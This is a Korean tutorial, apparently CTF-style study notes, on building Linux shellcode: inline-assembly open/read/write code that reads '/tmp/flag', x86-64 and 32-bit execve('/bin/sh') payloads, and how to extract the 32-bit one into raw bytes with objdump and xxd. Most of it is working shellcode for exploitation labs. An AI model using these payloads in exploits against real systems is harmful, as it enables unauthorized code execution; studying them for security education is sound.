
Shellcode 만들기

작성자 정보

  • za9uar 작성
  • 작성일

컨텐츠 정보



1. Open, Read, Write


Skeleton Code

// File name: sh-skeleton.c

// Compile Option: gcc -o sh-skeleton sh-skeleton.c -masm=intel



    ".global run_sh\n"


    "Input your shellcode here.\n"

    "Each line of your shellcode should be\n"

    "seperated by '\n'\n"

    "xor rdi, rdi   # rdi = 0\n"

    "mov rax, 0x3c # rax = sys_exit\n"

    "syscall        # exit(0)");


void run_sh();


int main() { run_sh(); }



orw.c (open,read,write 작성 예시)

// File name: orw.c

// Compile: gcc -o orw orw.c -masm=intel



    ".global run_sh\n"


    "push 0x67\n"

    "mov rax, 0x616c662f706d742f \n"

    "push rax\n"

    "mov rdi, rsp    # rdi = '/tmp/flag'\n"

    "xor rsi, rsi    # rsi = 0 ; RD_ONLY\n"

    "xor rdx, rdx    # rdx = 0\n"

    "mov rax, 2      # rax = 2 ; syscall_open\n"

    "syscall         # open('/tmp/flag', RD_ONLY, NULL)\n"


    "mov rdi, rax      # rdi = fd\n"

    "mov rsi, rsp\n"

    "sub rsi, 0x30     # rsi = rsp-0x30 ; buf\n"

    "mov rdx, 0x30     # rdx = 0x30     ; len\n"

    "mov rax, 0x0      # rax = 0        ; syscall_read\n"

    "syscall           # read(fd, buf, 0x30)\n"


    "mov rdi, 1        # rdi = 1 ; fd = stdout\n"

    "mov rax, 0x1      # rax = 1 ; syscall_write\n"

    "syscall           # write(fd, buf, 0x30)\n"


    "xor rdi, rdi      # rdi = 0\n"

    "mov rax, 0x3c    # rax = sys_exit\n"

    "syscall    # exit(0)");


void run_sh();


int main() { run_sh(); }



// 테스트 파일 생성


// 실행

# ./orw   





2. execve("/bin/sh", null, null)

Skeleton Code

;Name: execve.S


mov rax, 0x68732f6e69622f

push rax

mov rdi, rsp  ; rdi = "/bin/sh\x00"

xor rsi, rsi  ; rsi = NULL

xor rdx, rdx  ; rdx = NULL

mov rax, 0x3b ; rax = sys_execve

syscall       ; execve("/bin/sh", null, null)



셸코드 예제 

// File name: execve.c

// Compile Option: gcc -o execve execve.c -masm=intel


    ".global run_sh\n"


    "mov rax, 0x68732f6e69622f\n"

    "push rax\n"

    "mov rdi, rsp  # rdi = '/bin/sh'\n"

    "xor rsi, rsi  # rsi = NULL\n"

    "xor rdx, rdx  # rdx = NULL\n"

    "mov rax, 0x3b # rax = sys_execve\n"

    "syscall       # execve('/bin/sh', null, null)\n"

    "xor rdi, rdi   # rdi = 0\n"

    "mov rax, 0x3c # rax = sys_exit\n"

    "syscall        # exit(0)");


void run_sh();


int main() { run_sh(); }


bash$ gcc -o execve execve.c -masm=intel

bash$ ./execve

sh$ id 

uid=1000(dreamhack) gid=1000(dreamhack) groups=1000(dreamhack)





3. shellcode 추출


1) asm 코드 생성


; File name: shellcode.asm

section .text

global _start


xor    eax, eax

push   eax

push   0x68732f2f

push   0x6e69622f

mov    ebx, esp

xor    ecx, ecx

xor    edx, edx

mov    al, 0xb

int    0x80



$ sudo apt-get install nasm 

$ nasm -f elf shellcode.asm

$ objdump -d shellcode.o

shellcode.o:     file format elf32-i386

Disassembly of section .text:

00000000 <_start>:

   0: 31 c0                xor    %eax,%eax

   2: 50                    push   %eax

   3: 68 2f 2f 73 68        push   $0x68732f2f

   8: 68 2f 62 69 6e        push   $0x6e69622f

   d: 89 e3                mov    %esp,%ebx

   f: 31 c9                xor    %ecx,%ecx

  11: 31 d2                xor    %edx,%edx

  13: b0 0b                mov    $0xb,%al

  15: cd 80                int    $0x80



$ objcopy --dump-section .text=shellcode.bin shellcode.o

$ xxd shellcode.bin

00000000: 31c0 5068 2f2f 7368 682f 6269 6e89 e331  1.Ph//shh/bin..1

00000010: c931 d2b0 0bcd 80                        .1.....



# execve /bin/sh shellcode: 





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